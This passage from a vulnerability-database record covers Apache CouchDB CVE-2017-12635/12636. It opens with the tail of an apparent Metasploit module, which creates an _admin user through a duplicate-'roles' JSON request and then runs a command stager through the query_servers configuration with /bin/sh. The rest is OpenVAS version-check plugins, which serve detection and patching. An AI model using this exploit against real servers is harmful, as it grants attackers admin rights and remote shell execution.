newly created user. \ndef auth_bypass \nusername = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12) \npassword = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12) \n@auth = basic_auth(username, password) \n \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"), \n'method' => 'PUT', \n'ctype' => 'application/json', \n'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"}) \n) \n \nif res && (res.code == 200 || res.code == 201) && res.get_json_document['ok'] \nreturn true \nelse \nreturn false \nend \nend \n \ndef get_version \n@version = nil \n \nbegin \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path), \n'method' => 'GET', \n'authorization' => @auth \n) \nrescue Rex::ConnectionError \nvprint_bad(\"#{peer} - Connection failed\") \nreturn false \nend \n \nunless res \nvprint_bad(\"#{peer} - No response, check if it is CouchDB. \") \nreturn false \nend \n \nif res && res.code == 401 \nprint_bad(\"#{peer} - Authentication required.\") \nreturn false \nend \n \nif res && res.code == 200 \nres_json = res.get_json_document \n \nif res_json.empty? \nvprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\") \nreturn false \nend \n \n@version = res_json['version'] if res_json['version'] \nreturn true \nend \n \nvprint_warning(\"#{peer} - Version not found\") \nreturn true \nend \n \ndef send_payload(version) \nvprint_status(\"#{peer} - CouchDB version is #{version}\") if version \n \nversion = Gem::Version.new(@version) \nif version.version.empty? \nvprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\") \n# if target set Automatic, exploit failed. \nif target == targets[0] \nfail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\") \nelsif target == targets[1] \npayload1 \nelsif target == targets[2] \npayload2 \nend \nelsif version < Gem::Version.new('1.7.0') \npayload1 \nelsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) \npayload2 \nelsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0') \nfail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\") \nend \nend \n \n# Exploit with multi requests \n# payload1 is for the version of couchdb below 1.7.0 \ndef payload1 \nrand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_db = Rex::Text.rand_text_alpha_lower(4..12) \nrand_doc = Rex::Text.rand_text_alpha_lower(4..12) \nrand_hex = Rex::Text.rand_text_hex(32) \nrand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\" \n \nregister_file_for_cleanup(rand_file) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"), \n'method' => 'PUT', \n'authorization' => @auth \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %({\"_id\": \"#{rand_hex}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"), \n'method' => 'POST', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"/bin/sh #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"), \n'method' => 'POST', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"}) \n) \nend \n \n# payload2 is for the version of couchdb below 2.1.1 \ndef payload2 \nrand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_db = Rex::Text.rand_text_alpha_lower(4..12) \nrand_doc = Rex::Text.rand_text_alpha_lower(4..12) \nrand_tmp = Rex::Text.rand_text_alpha_lower(4..12) \nrand_hex = Rex::Text.rand_text_hex(32) \nrand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\" \n \nregister_file_for_cleanup(rand_file) \n \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_membership\"), \n'method' => 'GET', \n'authorization' => @auth \n) \n \nnode = res.get_json_document['all_nodes'][0] \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"), \n'method' => 'PUT', \n'authorization' => @auth \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %({\"_id\": \"#{rand_hex}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"/bin/sh #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"}) \n) \nend \n \ndef cmdstager_path \n@cmdstager_path ||= \n\"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\" \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148535/apache_couchdb_cmd_exec.rb.txt"}], "openvas": [{"lastseen": "2018-09-01T23:44:41", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JPX4VDEQJT7WWG25DKVRX4AHYKQQDOXX", "2017-d0a336a2a3"], "pluginID": "1361412562310873892", "description": "Check the version of couchdb", "edition": 3, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-12-10T00:00:00", "title": "Fedora Update for couchdb FEDORA-2017-d0a336a2a3", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2017-12-12T00:00:00", "id": "OPENVAS:1361412562310873892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873892", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_d0a336a2a3_couchdb_fc26.nasl 8085 2017-12-12 10:25:30Z santu $\n#\n# Fedora Update for couchdb FEDORA-2017-d0a336a2a3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873892\");\n script_version(\"$Revision: 8085 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-12 11:25:30 +0100 (Tue, 12 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-10 08:11:46 +0100 (Sun, 10 Dec 2017)\");\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for couchdb FEDORA-2017-d0a336a2a3\");\n script_tag(name: \"summary\", value: \"Check the version of couchdb\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Apache CouchDB is a distributed, fault-tolerant and schema-free\ndocument-oriented database accessible via a RESTful HTTP/JSON API.\nAmong other features, it provides robust, incremental replication\nwith bi-directional conflict detection and resolution, and is\nqueryable and indexable using a table-oriented view engine with\nJavaScript acting as the default view definition language.\n\");\n script_tag(name: \"affected\", value: \"couchdb on Fedora 26\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2017-d0a336a2a3\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JPX4VDEQJT7WWG25DKVRX4AHYKQQDOXX\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"couchdb\", rpm:\"couchdb~1.7.1~3.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:42:57", "references": ["https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/", "https://justi.cz/security/2017/11/14/couchdb-rce-npm.html"], "pluginID": "1361412562310107259", "description": "This host is installed with Apache CouchDB and is prone to multiple vulnerabilities.", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-16T00:00:00", "title": "CouchDB Multiple Vulnerabilities (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-04-18T00:00:00", "id": "OPENVAS:1361412562310107259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107259", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_couchdb_207_rce_vuln_win.nasl 9523 2018-04-18 21:57:48Z asteins $\n#\n# CouchDB Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:couchdb\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107259\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 9523 $\");\n\n script_name(\"CouchDB Multiple Vulnerabilities (Windows)\");\n\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_xref(name:\"URL\", value:\"https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/\");\n script_xref(name:\"URL\", value:\"https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-18 23:57:48 +0200 (Wed, 18 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-16 11:20:26 +0700 (Thu, 16 Nov 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_couchdb_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 5984);\n script_mandatory_keys(\"couchdb/installed\", \"Host/runs_windows\");\n\n script_tag(name: \"summary\", value: \"This host is installed with Apache CouchDB and is prone to multiple vulnerabilities.\");\n script_tag(name: \"vuldetect\", value: \"Checks the version\");\n script_tag(name: \"solution\", value: \"Upgrade to version 1.7.0 or 2.1.1 or later.\");\n script_tag(name: \"insight\", value: \"The vulnerabilities are due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser.\");\n script_tag(name: \"affected\", value: \"CouchDB Versions before 1.7.0 and 2.1.1.\");\n\n script_tag(name: \"impact\", value: \"These Vulnerabilities can be used to give non-admin users access to arbitrary shell commands on the server as the database system user.\");\n\n script_tag(name:\"solution_type\", value: \"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe:CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^1\\.\")\n{\n if (version_is_less(version: version, test_version: \"1.7.0\"))\n {\n fix = \"1.7.0\";\n VULN = TRUE;\n }\n}\n\nelse if (version =~ \"^2\\.\")\n{\n if (version_is_less(version: version, test_version: \"2.1.1\"))\n {\n fix = \"2.1.1\";\n VULN = TRUE;\n }\n}\n\nif (VULN)\n{\n report = report_fixed_ver(installed_version: version, fixed_version: fix);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:39:48", "references": ["https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html"], "pluginID": "1361412562310891252", "description": "CVE-2017-12635\nPrevent non-admin users to give themselves admin privileges.\n\nCVE-2017-12636\nBlacklist some configuration options to prevent execution of\narbitrary shell commands as the CouchDB user", "edition": 6, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-01-22T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 1252-1] couchdb security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310891252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891252", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1252.nasl 10474 2018-07-10 08:12:26Z cfischer $\n#\n# Auto-generated from advisory DLA 1252-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891252\");\n script_version(\"$Revision: 10474 $\");\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1252-1] couchdb security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-10 10:12:26 +0200 (Tue, 10 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-22 00:00:00 +0100 (Mon, 22 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"couchdb on Debian Linux\");\n script_tag(name:\"insight\", value:\"Apache CouchDB is a distributed, fault-tolerant and schema-free\ndocument-oriented database accessible via a RESTful HTTP/JSON API. Among other\nfeatures, it provides robust, incremental replication with bi-directional\nconflict detection and resolution, and is queryable and indexable using a\ntable-oriented view engine with JavaScript acting as the default view\ndefinition language.\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.2.0-5+deb7u1.\n\nWe recommend that you upgrade your couchdb packages.\");\n script_tag(name:\"summary\", value:\"CVE-2017-12635\nPrevent non-admin users to give themselves admin privileges.\n\nCVE-2017-12636\nBlacklist some configuration options to prevent execution of\narbitrary shell commands as the CouchDB user\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"couchdb\", ver:\"1.2.0-5+deb7u1\", rls_regex:\"DEB7\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:40", "references": ["https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NBU3DZ6WIJXHKGBWTBRNX43O3QCURUZ2", "2017-d0a336a2a3"], "pluginID": "1361412562310873886", "description": "Check the version of erlang-jiffy", "edition": 3, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-12-10T00:00:00", "title": "Fedora Update for erlang-jiffy FEDORA-2017-d0a336a2a3", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2017-12-12T00:00:00", "id": "OPENVAS:1361412562310873886", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873886", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_d0a336a2a3_erlang-jiffy_fc26.nasl 8085 2017-12-12 10:25:30Z santu $\n#\n# Fedora Update for erlang-jiffy FEDORA-2017-d0a336a2a3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873886\");\n script_version(\"$Revision: 8085 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-12 11:25:30 +0100 (Tue, 12 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-10 08:11:01 +0100 (Sun, 10 Dec 2017)\");\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for erlang-jiffy FEDORA-2017-d0a336a2a3\");\n script_tag(name: \"summary\", value: \"Check the version of erlang-jiffy\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"A JSON parser for Erlang implemented as a NIF.\n\");\n script_tag(name: \"affected\", value: \"erlang-jiffy on Fedora 26\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2017-d0a336a2a3\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NBU3DZ6WIJXHKGBWTBRNX43O3QCURUZ2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"erlang-jiffy\", rpm:\"erlang-jiffy~0.14.13~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:48", "references": ["2017-a20d92573b", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JGVZMJUWW6HTBCKLQ2GNB4HXZGO4BYI7"], "pluginID": "1361412562310873893", "description": "Check the version of erlang-jiffy", "edition": 3, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-12-10T00:00:00", "title": "Fedora Update for erlang-jiffy FEDORA-2017-a20d92573b", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2017-12-12T00:00:00", "id": "OPENVAS:1361412562310873893", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873893", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_a20d92573b_erlang-jiffy_fc27.nasl 8085 2017-12-12 10:25:30Z santu $\n#\n# Fedora Update for erlang-jiffy FEDORA-2017-a20d92573b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873893\");\n script_version(\"$Revision: 8085 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-12 11:25:30 +0100 (Tue, 12 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-10 08:11:51 +0100 (Sun, 10 Dec 2017)\");\n script_cve_id(\"CVE-2017-12635\", \"CVE-2017-12636\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for erlang-jiffy FEDORA-2017-a20d92573b\");\n script_tag(name: \"summary\", value: \"Check the version of erlang-jiffy\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"A JSON parser for Erlang implemented as a \nNIF.\");\n script_tag(name: \"affected\", value: \"erlang-jiffy on Fedora 27\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2017-a20d92573b\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JGVZMJUWW6HTBCKLQ2GNB4HXZGO4BYI7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"erlang-jiffy\", rpm:\"erlang-jiffy~0.14.13~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:45", "references": ["2017-a20d92573b", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5RYHD7TC6RJN4HYWPEQTSB3WTFKR56AC"], "pluginID": "1361412562310873882", "description": "Check the version of couchdb", "edition": 3, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-12-10T00:00:00", "title": "Fedora Update for couchdb FEDORA-2017-a20d92573b", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12635", "CVE-2017-12636"], "modified": "2017-12-12T00:00:00", "id": "OPENVAS:1361412562310873882", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873882", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_a20d92573b_couchdb_fc27.nasl 8085 2017-12-12 10:25:30Z santu $\n#\n# Fedora Update for couchdb FEDORA-2017-a20d92573b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public 